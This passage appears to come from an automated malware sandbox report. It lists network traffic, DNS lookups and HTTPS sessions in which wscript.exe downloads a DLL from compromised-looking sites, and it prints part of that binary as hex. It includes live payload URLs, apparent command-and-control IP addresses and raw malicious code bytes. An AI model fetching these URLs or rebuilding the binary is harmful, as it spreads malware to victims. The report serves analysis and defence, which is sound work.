                                                                                          Mar 20, 2023 09:08:11.231015921 CET49737443192.168.2.3164.90.222.65
                                                                                          Mar 20, 2023 09:08:11.231026888 CET44349737164.90.222.65192.168.2.3
                                                                                          Mar 20, 2023 09:08:15.086031914 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:15.250612020 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:15.273320913 CET4971680192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:15.292093992 CET8049716192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:08:15.294871092 CET4971680192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:15.751230001 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:15.915502071 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:16.416353941 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:16.580425978 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.080503941 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:17.244565010 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.744424105 CET497388080192.168.2.3104.168.155.143
                                                                                          Mar 20, 2023 09:08:17.908720970 CET8049707192.229.221.95192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.908828974 CET808049738104.168.155.143192.168.2.3
                                                                                          Mar 20, 2023 09:08:17.909219980 CET4970780192.168.2.3192.229.221.95
                                                                                          Mar 20, 2023 09:08:23.385893106 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:23.592777014 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:24.092982054 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:24.299802065 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:24.800076962 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:25.007067919 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:25.507061958 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:25.713885069 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:26.215094090 CET497398080192.168.2.3163.44.196.120
                                                                                          Mar 20, 2023 09:08:26.421792984 CET808049739163.44.196.120192.168.2.3
                                                                                          Mar 20, 2023 09:08:31.887692928 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:32.887650013 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:34.887854099 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:38.888133049 CET497408080192.168.2.3160.16.142.56
                                                                                          Mar 20, 2023 09:08:46.891804934 CET497408080192.168.2.3160.16.142.56

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Mar 20, 2023 09:06:36.428728104 CET6000853192.168.2.31.1.1.1
                                                                                          Mar 20, 2023 09:06:37.266818047 CET53600081.1.1.1192.168.2.3
                                                                                          Mar 20, 2023 09:06:38.496239901 CET5371053192.168.2.31.1.1.1
                                                                                          Mar 20, 2023 09:06:38.754851103 CET53537101.1.1.1192.168.2.3
                                                                                          Mar 20, 2023 09:06:39.017168045 CET5510353192.168.2.31.1.1.1
                                                                                          Mar 20, 2023 09:06:39.699096918 CET53551031.1.1.1192.168.2.3

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Mar 20, 2023 09:06:36.428728104 CET192.168.2.31.1.1.10x4e7eStandard query (0)penshorn.orgA (IP address)IN (0x0001)false
                                                                                          Mar 20, 2023 09:06:38.496239901 CET192.168.2.31.1.1.10x4d17Standard query (0)bbvoyage.comA (IP address)IN (0x0001)false
                                                                                          Mar 20, 2023 09:06:39.017168045 CET192.168.2.31.1.1.10x8dc3Standard query (0)www.gomespontes.com.brA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Mar 20, 2023 09:06:37.266818047 CET1.1.1.1192.168.2.30x4e7eNo error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false
                                                                                          Mar 20, 2023 09:06:38.754851103 CET1.1.1.1192.168.2.30x4d17No error (0)bbvoyage.com31.31.196.172A (IP address)IN (0x0001)false
                                                                                          Mar 20, 2023 09:06:39.699096918 CET1.1.1.1192.168.2.30x8dc3No error (0)www.gomespontes.com.brgomespontes.com.brCNAME (Canonical name)IN (0x0001)false
                                                                                          Mar 20, 2023 09:06:39.699096918 CET1.1.1.1192.168.2.30x8dc3No error (0)gomespontes.com.br186.202.153.5A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • penshorn.org
                                                                                          • bbvoyage.com
                                                                                          • www.gomespontes.com.br
                                                                                          • 164.90.222.65

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.349727203.26.41.131443C:\Windows\System32\wscript.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-03-20 08:06:38 UTC0OUTGET /admin/Ses8712iGR8du/ HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                          Host: penshorn.org
                                                                                          2023-03-20 08:06:38 UTC0INHTTP/1.1 404 Not Found
                                                                                          Date: Mon, 20 Mar 2023 08:06:38 GMT
                                                                                          Server: Apache
                                                                                          X-Powered-By: PHP/7.0.33
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Content-Type: text/html;charset=utf-8


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.34972831.31.196.172443C:\Windows\System32\wscript.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-03-20 08:06:38 UTC0OUTGET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                          Host: bbvoyage.com
                                                                                          2023-03-20 08:06:39 UTC0INHTTP/1.1 401 Unauthorized
                                                                                          Server: nginx
                                                                                          Date: Mon, 20 Mar 2023 08:06:38 GMT
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          WWW-Authenticate: Basic realm="virus_block | access denied, please check email. For access use regru/regru."
                                                                                          2023-03-20 08:06:39 UTC0INData Raw: 31 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f
                                                                                          Data Ascii: 17d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wro


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.349729186.202.153.5443C:\Windows\System32\wscript.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-03-20 08:06:40 UTC1OUTGET /logs/pd/ HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                          Host: www.gomespontes.com.br
                                                                                          2023-03-20 08:06:40 UTC1INHTTP/1.1 200 OK
                                                                                          Date: Mon, 20 Mar 2023 08:06:40 GMT
                                                                                          Server: Apache
                                                                                          X-Powered-By: PHP/7.4.23
                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 20 Mar 2023 08:06:40 GMT
                                                                                          Content-Disposition: attachment; filename="rwPf3h8uzvlMGyyxN0K0OLQcAOU46ugB.dll"
                                                                                          Content-Transfer-Encoding: binary
                                                                                          Set-Cookie: 64181410b8d60=1679299600; expires=Mon, 20-Mar-2023 08:07:40 GMT; Max-Age=60; path=/
                                                                                          Last-Modified: Mon, 20 Mar 2023 08:06:40 GMT
                                                                                          Connection: close
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: application/x-msdownload
                                                                                          2023-03-20 08:06:40 UTC1INData Raw: 34 64 36 30 30 0d 0a
                                                                                          Data Ascii: 4d600
                                                                                          2023-03-20 08:06:40 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52 69 63 68 08 01 8c
                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonRich
                                                                                          2023-03-20 08:06:41 UTC9INData Raw: b4 39 01 00 e8 a7 cc 00 00 85 c0 74 0e ba 01 00 00 00 48 8b cd ff 15 9d 39 01 00 8b 4c f3 10 41 b8 01 00 00 00 49 03 cc 49 8b d5 e8 e0 19 00 00 49 8b 47 40 4c 8b c5 8b 54 f3 10 49 8b cd 44 8b 4d 00 49 03 d4 48 89 44 24 28 49 8b 47 28 48 89 44 24 20 ff 15 b7 35 01 00 e8 e2 19 00 00 ff c7 e9 35 ff ff ff 33 c0 e9 b1 00 00 00 49 8b 77 20 49 2b f4 e9 96 00 00 00 8b cf 48 03 c9 8b 44 cb 04 4c 3b f0 0f 82 82 00 00 00 8b 44 cb 08 4c 3b f0 73 79 44 8b 55 04 41 83 e2 20 74 44 45 33 c9 85 d2 74 38 45 8b c1 4d 03 c0 42 8b 44 c3 04 48 3b f0 72 20 42 8b 44 c3 08 48 3b f0 73 16 8b 44 cb 10 42 39 44 c3 10 75 0b 8b 44 cb 0c 42 39 44 c3 0c 74 08 41 ff c1 44 3b ca 72 c8 44 3b ca 75 37 8b 44 cb 10 85 c0 74 0c 48 3b f0 75 1e 45 85 d2 75 25 eb 17 8d 47 01 49 8b d5 41 89 47 48
                                                                                          Data Ascii: 9tH9LAIIIG@LTIDMIHD$(IG(HD$ 553Iw I+HDL;DL;syDUA tDE3t8EMBDH;r BDH;sDB9DuDB9DtAD;rD;u7DtH;uEu%GIAGH
                                                                                          2023-03-20 08:06:41 UTC17INData Raw: 02 10 74 18 48 8b 09 48 83 e9 08 48 8b 01 48 8b 58 30 48 8b 40 40 ff 15 d4 18 01 00 48 8d 54 24 20 48 8b cb ff 15 26 17 01 00 48 89 44 24 20 48 85 db 74 0f f6 03 08 75 05 48 85 c0 75 05 bf 00 40 99 01 ba 01 00 00 00 48 89 7c 24 28 4c 8d 4c 24 28 48 89 74 24 30 b9 63 73 6d e0 48 89 5c 24 38 48 89 44 24 40 44 8d 42 03 ff 15 80 16 01 00 48 8b 5c 24 70 48 8b 74 24 78 48 83 c4 50 5f c3 cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 57 56 48 8b f9 48 8b f2 49 8b c8 f3 a4 5e 5f c3 cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 8b c1 4c 8d 15 c6 b4 ff ff 49 83 f8 0f 0f 87 0c 01 00 00 66 66 66 66 0f 1f 84 00 00 00 00 00 47 8b 8c 82 b0 50 02 00 4d 03 ca 41 ff e1 c3 90 4c 8b 02 8b 4a 08 44 0f b7 4a 0c 44 0f b6 52 0e 4c 89 00 89 48 08 66 44 89 48 0c 44 88 50 0e
                                                                                          Data Ascii: tHHHHX0H@@HT$ H&HD$ HtuHu@H|$(LL$(Ht$0csmH\$8HD$@DBH\$pHt$xHP_ffWVHHI^_ffHLIffffGPMALJDJDRLHfDHDP
                                                                                          2023-03-20 08:06:41 UTC25INData Raw: c4 20 41 5f 41 5e 5f c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 20 48 8b 01 48 8b f1 48 8b 10 48 85 d2 75 08 83 c8 ff e9 d9 00 00 00 4c 8b 05 13 a6 01 00 41 8b c8 49 8b f8 48 33 3a 83 e1 3f 48 d3 cf 49 8b d8 48 33 5a 08 48 d3 cb 48 8d 47 ff 48 83 f8 fd 0f 87 a9 00 00 00 41 8b c8 4d 8b f0 83 e1 3f 4c 8b ff 48 8b eb 48 83 eb 08 48 3b df 72 5f 48 8b 03 49 3b c6 74 ef 49 33 c0 4c 89 33 48 d3 c8 49 ba 70 48 da 56 96 3e f1 85 ff 15 1b f9 00 00 4c 8b 05 ac a5 01 00 48 8b 06 41 8b c8 83 e1 3f 4d 8b c8 48 8b 10 49 8b c0 4c 33 0a 48 33 42 08 49 d3 c9 48 d3 c8 4d 3b cf 75 05 48 3b c5 74 a6 4d 8b f9 49 8b f9 48 8b e8 48 8b d8 eb 98 48 83 ff ff 74 0f 48 8b cf e8 e3 1c 00 00 4c 8b 05 60 a5 01 00 48 8b 06 48 8b 08 4c 89 01 48 8b 06 48 8b 08
                                                                                          Data Ascii: A_A^_H\$Hl$Ht$WAVAWH HHHHuLAIH3:?HIH3ZHHGHAM?LHHH;r_HI;tI3L3HIpHV>LHA?MHIL3H3BIHM;uH;tMIHHHtHL`HHLHH
                                                                                          2023-03-20 08:06:41 UTC33INData Raw: 89 53 18 85 c0 75 33 48 8b 43 10 41 83 c9 ff 89 54 24 28 4c 8b c7 8b cd 48 89 44 24 20 41 8d 51 0a e8 9e 17 00 00 48 98 48 85 c0 0f 84 76 ff ff ff 48 ff c8 48 89 43 20 33 c0 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5e c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 40 45 33 f6 41 8b e9 48 8b da 48 8b f9 48 85 c9 75 24 44 38 72 28 74 0d 48 8b 4a 10 e8 fb fd ff ff 44 88 73 28 4c 89 73 10 4c 89 73 18 4c 89 73 20 e9 20 01 00 00 66 44 39 31 75 54 4c 39 72 18 75 45 44 38 72 28 74 0d 48 8b 4a 10 e8 cb fd ff ff 44 88 73 28 b9 01 00 00 00 e8 f5 2a 00 00 48 89 43 10 49 8b d6 48 f7 d8 1b c0 f7 d0 83 e0 0c 0f 94 c2 85 c0 0f 94 c1 88 4b 28 48 89 53 18 85 c0 0f 85 d1 00 00 00 48 8b 43 10 44 88 30 eb
                                                                                          Data Ascii: Su3HCAT$(LHD$ AQHHvHHC 3H\$@Hl$HHt$PH|$XH0A^HHXHhHpHx AVH@E3AHHHu$D8r(tHJDs(LsLsLs fD91uTL9ruED8r(tHJDs(*HCIHK(HSHCD0
                                                                                          2023-03-20 08:06:41 UTC40INData Raw: 1d fb 7d 01 00 48 8b 0b 48 85 c9 74 10 48 83 f9 ff 74 06 ff 15 5f b9 00 00 48 83 23 00 48 83 c3 08 48 8d 05 80 7e 01 00 48 3b d8 75 d8 b0 01 48 83 c4 20 5b c3 cc cc cc 48 83 ec 28 ff 15 06 b8 00 00 48 85 c0 48 89 05 5c 7f 01 00 0f 95 c0 48 83 c4 28 c3 48 83 25 4c 7f 01 00 00 b0 01 c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 81 ec 90 00 00 00 48 8d 48 88 ff 15 52 b8 00 00 45 33 f6 66 44 39 74 24 62 0f 84 9a 00 00 00 48 8b 44 24 68 48 85 c0 0f 84 8c 00 00 00 48 63 18 48 8d 70 04 bf 00 20 00 00 48 03 de 39 38 0f 4c 38 8b cf e8 6e 29 00 00 3b 3d ec 82 01 00 0f 4f 3d e5 82 01 00 85 ff 74 60 41 8b ee 48 83 3b ff 74 47 48 83 3b fe 74 41 f6 06 01 74 3c f6 06 08 75 0d 48 8b 0b ff 15 47 b7 00 00 85 c0 74 2a 48 8b c5 4c 8d 05 b1 7e 01 00
                                                                                          Data Ascii: }HHtHt_H#HH~H;uH [H(HH\H(H%LHHXHhHpHx AVHHHRE3fD9t$bHD$hHHcHp H98L8n);=O=t`AH;tGH;tAt<uHGt*HL~
                                                                                          2023-03-20 08:06:41 UTC48INData Raw: 0f 73 d9 05 eb 7b 66 0f 73 f9 06 66 0f 73 d9 06 eb 6f 66 0f 73 f9 07 66 0f 73 d9 07 eb 63 66 0f 73 f9 08 66 0f 73 d9 08 eb 57 66 0f 73 f9 09 66 0f 73 d9 09 eb 4b 66 0f 73 f9 0a 66 0f 73 d9 0a eb 3f 66 0f 73 f9 0b 66 0f 73 d9 0b eb 33 66 0f 73 f9 0c 66 0f 73 d9 0c eb 27 66 0f 73 f9 0d 66 0f 73 d9 0d eb 1b 66 0f 73 f9 0e 66 0f 73 d9 0e eb 0f 66 0f 73 f9 0f 66 0f 73 d9 0f eb 03 0f 57 c9 45 85 db 0f 85 e2 00 00 00 f3 0f 6f 57 10 66 0f 6f c2 66 0f 74 c3 66 0f d7 c0 85 c0 75 35 48 8b d3 49 8b c8 48 8b 5c 24 10 48 8b 74 24 18 5f e9 6b fd ff ff 4d 85 d2 75 d0 44 38 57 01 0f 84 a8 00 00 00 48 8b 5c 24 10 48 8b 74 24 18 5f e9 4c fd ff ff 0f bc c8 8b c1 49 2b c2 48 83 c0 10 48 83 f8 10 77 b9 44 2b c9 41 83 f9 0f 77 79 42 8b 8c 8e c8 c9 00 00 48 03 ce ff e1 66 0f 73
                                                                                          Data Ascii: s{fsfsofsfscfsfsWfsfsKfsfs?fsfs3fsfs'fsfsfsfsfsfsWEoWfoftfu5HIH\$Ht$_kMuD8WH\$Ht$_LI+HHwD+AwyBHfs
                                                                                          2023-03-20 08:06:41 UTC56INData Raw: c3 08 48 3b df 75 ef 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 48 85 c9 0f 84 fe 00 00 00 48 89 5c 24 08 48 89 6c 24 10 56 48 83 ec 20 bd 07 00 00 00 48 8b d9 8b d5 e8 a5 ff ff ff 48 8d 4b 38 8b d5 e8 9a ff ff ff 8d 75 05 8b d6 48 8d 4b 70 e8 8c ff ff ff 48 8d 8b d0 00 00 00 8b d6 e8 7e ff ff ff 48 8d 8b 30 01 00 00 8d 55 fb e8 6f ff ff ff 48 8b 8b 40 01 00 00 e8 4f a0 ff ff 48 8b 8b 48 01 00 00 e8 43 a0 ff ff 48 8b 8b 50 01 00 00 e8 37 a0 ff ff 48 8d 8b 60 01 00 00 8b d5 e8 3d ff ff ff 48 8d 8b 98 01 00 00 8b d5 e8 2f ff ff ff 48 8d 8b d0 01 00 00 8b d6 e8 21 ff ff ff 48 8d 8b 30 02 00 00 8b d6 e8 13 ff ff ff 48 8d 8b 90 02 00 00 8d 55 fb e8 04 ff ff ff 48 8b 8b a0 02 00 00 e8 e4 9f ff ff 48 8b 8b a8 02 00 00 e8 d8 9f ff ff 48 8b 8b b0 02 00 00 e8 cc 9f ff
                                                                                          Data Ascii: H;uH\$0H _HH\$Hl$VH HHK8uHKpH~H0UoH@OHHCHP7H`=H/H!H0HUHHH
                                                                                          2023-03-20 08:06:41 UTC64INData Raw: 8b 84 24 a0 00 00 00 48 8b 00 48 8b 8c 24 a0 00 00 00 ff 50 10 41 b8 01 00 00 00 33 d2 48 8b 8c 24 a8 00 00 00 ff 15 45 5c 00 00 eb 3d 8b 44 24 44 89 44 24 34 83 7c 24 34 01 74 02 eb 2c 48 8b 84 24 a0 00 00 00 48 8b 00 48 8b 8c 24 a0 00 00 00 ff 50 08 41 b8 01 00 00 00 33 d2 48 8b 8c 24 a8 00 00 00 ff 15 06 5c 00 00 48 8b 8c 24 b8 00 00 00 ff 15 08 5c 00 00 b8 01 00 00 00 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8d 0d 27 d9 00 00 48 89 08 c3 cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 8d 0d 07 d9 00 00 48 89 08 48 8b 44 24 08 c7 40 18 00 00 00 00 48 8b 44 24 08 c3 cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 81 ec c8 00 00 00 48 8b 05 0f 09
                                                                                          Data Ascii: $HH$PA3H$E\=D$DD$4|$4t,H$HH$PA3H$\H$\HHL$HD$H'HHL$HD$HHHD$@HD$LL$ LD$T$HL$HH
                                                                                          2023-03-20 08:06:41 UTC72INData Raw: 00 85 c0 75 06 ff 15 6d 3b 00 00 33 d2 33 c9 ff 15 8b 3d 00 00 85 c0 75 06 ff 15 59 3b 00 00 33 d2 33 c9 ff 15 77 3d 00 00 85 c0 75 06 ff 15 45 3b 00 00 33 d2 33 c9 ff 15 63 3d 00 00 85 c0 75 06 ff 15 31 3b 00 00 33 d2 33 c9 ff 15 4f 3d 00 00 85 c0 75 06 ff 15 1d 3b 00 00 33 d2 33 c9 ff 15 3b 3d 00 00 85 c0 75 06 ff 15 09 3b 00 00 33 d2 33 c9 ff 15 27 3d 00 00 85 c0 75 06 ff 15 f5 3a 00 00 33 d2 33 c9 ff 15 13 3d 00 00 85 c0 75 06 ff 15 e1 3a 00 00 33 d2 33 c9 ff 15 ff 3c 00 00 85 c0 75 06 ff 15 cd 3a 00 00 33 d2 33 c9 ff 15 eb 3c 00 00 85 c0 75 06 ff 15 b9 3a 00 00 33 d2 33 c9 ff 15 d7 3c 00 00 85 c0 75 06 ff 15 a5 3a 00 00 33 d2 33 c9 ff 15 c3 3c 00 00 85 c0 75 06 ff 15 91 3a 00 00 33 d2 33 c9 ff 15 af 3c 00 00 85 c0 75 06 ff 15 7d 3a 00 00 33 d2 33 c9
                                                                                          Data Ascii: um;33=uY;33w=uE;33c=u1;33O=u;33;=u;33'=u:33=u:33<u:33<u:33<u:33<u:33<u}:33
                                                                                          2023-03-20 08:06:41 UTC79INData Raw: ff 15 5a 1e 00 00 85 c0 75 06 ff 15 28 1c 00 00 33 d2 33 c9 ff 15 46 1e 00 00 85 c0 75 06 ff 15 14 1c 00 00 33 d2 33 c9 ff 15 32 1e 00 00 85 c0 75 06 ff 15 00 1c 00 00 33 d2 33 c9 ff 15 1e 1e 00 00 85 c0 75 06 ff 15 ec 1b 00 00 33 d2 33 c9 ff 15 0a 1e 00 00 85 c0 75 06 ff 15 d8 1b 00 00 33 d2 33 c9 ff 15 f6 1d 00 00 85 c0 75 06 ff 15 c4 1b 00 00 33 d2 33 c9 ff 15 e2 1d 00 00 85 c0 75 06 ff 15 b0 1b 00 00 33 d2 33 c9 ff 15 ce 1d 00 00 85 c0 75 06 ff 15 9c 1b 00 00 33 d2 33 c9 ff 15 ba 1d 00 00 85 c0 75 06 ff 15 88 1b 00 00 33 d2 33 c9 ff 15 a6 1d 00 00 85 c0 75 06 ff 15 74 1b 00 00 33 d2 33 c9 ff 15 92 1d 00 00 85 c0 75 06 ff 15 60 1b 00 00 33 d2 33 c9 ff 15 7e 1d 00 00 85 c0 75 06 ff 15 4c 1b 00 00 33 d2 33 c9 ff 15 6a 1d 00 00 85 c0 75 06 ff 15 38 1b 00
                                                                                          Data Ascii: Zu(33Fu332u33u33u33u33u33u33u33ut33u`33~uL33ju8
                                                                                          2023-03-20 08:06:41 UTC87INData Raw: 3c 3d 00 00 3e 00 00 00 3e 3d 00 00 2c 00 00 00 28 29 00 00 7e 00 00 00 5e 00 00 00 7c 00 00 00 26 26 00 00 7c 7c 00 00 2a 3d 00 00 2b 3d 00 00 2d 3d 00 00 2f 3d 00 00 25 3d 00 00 3e 3e 3d 00 3c 3c 3d 00 26 3d 00 00 7c 3d 00 00 5e 3d 00 00 60 76 66 74 61 62 6c 65 27 00 00 00 00 00 00 00 60 76 62 74 61 62 6c 65 27 00 00 00 00 00 00 00 60 76 63 61 6c 6c 27 00 60 74 79 70 65 6f 66 27 00 00 00 00 00 00 00 00 60 6c 6f 63 61 6c 20 73 74 61 74 69 63 20 67 75 61 72 64 27 00 00 00 00 60 73 74 72 69 6e 67 27 00 00 00 00 00 00 00 00 60 76 62 61 73 65 20 64 65 73 74 72 75 63 74 6f 72 27 00 00 00 00 00 00 60 76 65 63 74 6f 72 20 64 65 6c 65 74 69 6e 67 20 64 65 73 74 72 75 63 74 6f 72 27 00 00 00 00 60 64 65 66 61 75 6c 74 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 63 6c
                                                                                          Data Ascii: <=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor cl
                                                                                          2023-03-20 08:06:41 UTC95INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          2023-03-20 08:06:41 UTC103INData Raw: f0 9f 01 80 01 00 00 00 00 00 00 00 00 00 00 00 60 ba 01 80 01 00 00 00 d8 00 00 00 00 00 00 00 70 ba 01 80 01 00 00 00 da 00 00 00 00 00 00 00 80 ba 01 80 01 00 00 00 b1 00 00 00 00 00 00 00 90 ba 01 80 01 00 00 00 a0 00 00 00 00 00 00 00 a0 ba 01 80 01 00 00 00 8f 00 00 00 00 00 00 00 b0 ba 01 80 01 00 00 00 cf 00 00 00 00 00 00 00 c0 ba 01 80 01 00 00 00 d5 00 00 00 00 00 00 00 d0 ba 01 80 01 00 00 00 d2 00 00 00 00 00 00 00 e0 ba 01 80 01 00 00 00 a9 00 00 00 00 00 00 00 f0 ba 01 80 01 00 00 00 b9 00 00 00 00 00 00 00 00 bb 01 80 01 00 00 00 c4 00 00 00 00 00 00 00 10 bb 01 80 01 00 00 00 dc 00 00 00 00 00 00 00 20 bb 01 80 01 00 00 00 43 00 00 00 00 00 00 00 30 bb 01 80 01 00 00 00 cc 00 00 00 00 00 00 00 40 bb 01 80 01 00 00 00 bf 00 00 00 00 00 00
                                                                                          Data Ascii: `p C0@
